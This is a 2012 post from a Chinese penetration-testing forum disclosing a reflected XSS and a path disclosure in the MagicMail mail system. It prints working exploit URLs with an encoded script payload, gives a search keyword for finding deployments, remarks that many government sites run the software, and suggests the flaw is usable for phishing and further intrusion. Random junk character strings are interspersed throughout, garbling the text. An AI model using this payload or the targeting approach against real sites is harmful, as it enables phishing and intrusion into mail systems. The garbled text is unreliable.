中国网络渗透测试联盟

标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞 [打印本页]
作者: admin    时间: 2012-11-9 20:38
标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
( ^+ u  ?9 ]2 i3 X3 D
) `9 \* b, g; G # V) `  ]. G  [: n" S
包含  一个反射性XSS  以及  绝对路径泄漏
* M" j2 w! e& Y6 S; P0 }看了看 貌似全部是linux的。9 o7 _  U0 _3 c# _) A
. t7 Y: F; i  x3 ]
关键字:迈捷邮件系统 by MagicMail
$ F1 u# A; z0 \: e. I9 k( R- p. C, f  m  _2 s, ]3 {
可以看到很多政府网站都用这个邮件系统% r0 J( d( N8 j1 `, G

& A4 D( y  ]$ n/ U; v* A$ d* p绝对路径 http://madman.in/index.php?login_type=declare&language=$ q) E* G! t" F
  @) @3 a" @2 U- `2 m  y
% d4 j8 [& t  g; C( \( u+ r# U' `# M

; E2 V* [% }, l! PXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E; [" q3 R. ]+ c0 I) p: r  ?

$ \, p6 t9 U$ I. S- w; W) Z1 S5 r5 C; m1 [
/ n0 S5 y4 _/ V# L' \' Z# @' X
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等& M1 n  S2 F( W

8 n& q1 ~; n- U/ g, n修复方案:看官方补丁吧。  ~$ l+ G! O: D2 F' W& [+ `




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2